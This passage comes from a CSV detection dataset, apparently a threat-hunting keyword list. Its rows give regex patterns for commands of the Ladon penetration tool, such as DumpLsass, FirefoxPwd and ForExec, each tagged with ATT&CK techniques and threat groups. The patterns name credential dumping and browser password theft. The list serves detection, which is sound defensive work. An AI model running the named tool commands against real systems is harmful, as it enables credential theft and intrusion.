Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/k8gege/Ladon","1","0","N/A","N/A","10","10","5025","880","2025-03-24T13:53:59Z","2019-11-02T06:22:41Z","50719"
"*Ladon DumpLsass*",".{0,1000}Ladon\sDumpLsass.{0,1000}","offensive_tool_keyword","cobaltstrike","Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. loaded in memory and has no file scanning","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","Ghost Ransomware","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/k8gege/Ladon","1","0","N/A","N/A","10","10","5025","880","2025-03-24T13:53:59Z","2019-11-02T06:22:41Z","50720"
"*Ladon EnableDotNet*",".{0,1000}Ladon\sEnableDotNet.{0,1000}","offensive_tool_keyword","cobaltstrike","Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. loaded in memory and has no file scanning","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","Ghost Ransomware","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/k8gege/Ladon","1","0","N/A","N/A","10","10","5025","880","2025-03-24T13:53:59Z","2019-11-02T06:22:41Z","50721"
"*Ladon EnumProcess*",".{0,1000}Ladon\sEnumProcess.{0,1000}","offensive_tool_keyword","cobaltstrike","Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. loaded in memory and has no file scanning","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","Ghost Ransomware","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/k8gege/Ladon","1","0","N/A","N/A","10","10","5025","880","2025-03-24T13:53:59Z","2019-11-02T06:22:41Z","50722"
"*Ladon EnumShare*",".{0,1000}Ladon\sEnumShare.{0,1000}","offensive_tool_keyword","cobaltstrike","Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. loaded in memory and has no file scanning","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","Ghost Ransomware","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/k8gege/Ladon","1","0","N/A","N/A","10","10","5025","880","2025-03-24T13:53:59Z","2019-11-02T06:22:41Z","50723"
"*Ladon Exploit*",".{0,1000}Ladon\sExploit.{0,1000}","offensive_tool_keyword","cobaltstrike","Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. loaded in memory and has no file scanning","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","Ghost Ransomware","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/k8gege/Ladon","1","0","N/A","N/A","10","10","5025","880","2025-03-24T13:53:59Z","2019-11-02T06:22:41Z","50724"
"*Ladon FindIP *",".{0,1000}Ladon\sFindIP\s.{0,1000}","offensive_tool_keyword","cobaltstrike","Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. loaded in memory and has no file scanning","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","Ghost Ransomware","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/k8gege/Ladon","1","0","N/A","N/A","10","10","5025","880","2025-03-24T13:53:59Z","2019-11-02T06:22:41Z","50725"
"*Ladon FirefoxCookie*",".{0,1000}Ladon\sFirefoxCookie.{0,1000}","offensive_tool_keyword","cobaltstrike","Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. loaded in memory and has no file scanning","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","Ghost Ransomware","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/k8gege/Ladon","1","0","N/A","N/A","10","10","5025","880","2025-03-24T13:53:59Z","2019-11-02T06:22:41Z","50726"
"*Ladon FirefoxHistory*",".{0,1000}Ladon\sFirefoxHistory.{0,1000}","offensive_tool_keyword","cobaltstrike","Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. loaded in memory and has no file scanning","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","Ghost Ransomware","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/k8gege/Ladon","1","0","N/A","N/A","10","10","5025","880","2025-03-24T13:53:59Z","2019-11-02T06:22:41Z","50727"
"*Ladon FirefoxPwd*",".{0,1000}Ladon\sFirefoxPwd.{0,1000}","offensive_tool_keyword","cobaltstrike","Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. loaded in memory and has no file scanning","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","Ghost Ransomware","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/k8gege/Ladon","1","0","N/A","N/A","10","10","5025","880","2025-03-24T13:53:59Z","2019-11-02T06:22:41Z","50728"
"*Ladon ForExec *",".{0,1000}Ladon\sForExec\s.{0,1000}","offensive_tool_keyword","cobaltstrike","Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. loaded in memory and has no file scanning","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","Ghost Ransomware","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/k8gege/Ladon","1","0","N/A","N/A","10","10","5025","880","2025-03-24T13:53:59Z","2019-11-02T06:22:41Z","50729"
"*Ladon FtpDownLoad *",".{0,1000}Ladon\sFtpDownLoad\s.{0,1000}","offensive_tool_keyword","cobaltstrike","Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. loaded in memory and has no file scanning","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","Ghost Ransomware","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/k8gege/Ladon","1","0","N/A","N/A","10","10","5025","880","2025-03-24T13:53:59Z","2019-11-02T06:22:41Z","50730"
"*Ladon FtpServer *",".{0,1000}Ladon\sFtpServer\s.{0,1000}","offensive_tool_keyword","cobaltstrike","Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. loaded in memory and has no file scanning","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","Ghost Ransomware","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/k8gege/Ladon","1","0","N/A","N/A","10","10","5025","880","2025-03-24T13:53:59Z","2019-11-02T06:22:41Z","50731"
"*Ladon GetDomainIP*",".{0,1000}Ladon\sGetDomainIP.{0,1000}","offensive_tool_keyword","cobaltstrike","Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. loaded in memory and has no file scanning","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","Ghost Ransomware","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/k8gege/Ladon","1","0","N/A","N/A","10","10","5025","880","2025-03-24T13:53:59Z","2019-11-02T06:22:41Z","50732"
"*Ladon gethtml *",".{0,1000}Ladon\sgethtml\s.{0,1000}","offensive_tool_keyword","cobaltstrike","Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. loaded in memory and has no file scanning","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","Ghost Ransomware","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/k8gege/Ladon","1","0","N/A","N/A","10","10","5025","880","2025-03-24T13:53:59Z","2019-11-02T06:22:41Z","50733"
"*Ladon GetPipe*",".{0,1000}Ladon\sGetPipe.{0,1000}","offensive_tool_keyword","cobaltstrike","Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. loaded in memory and has no file scanning","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","Ghost Ransomware","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - 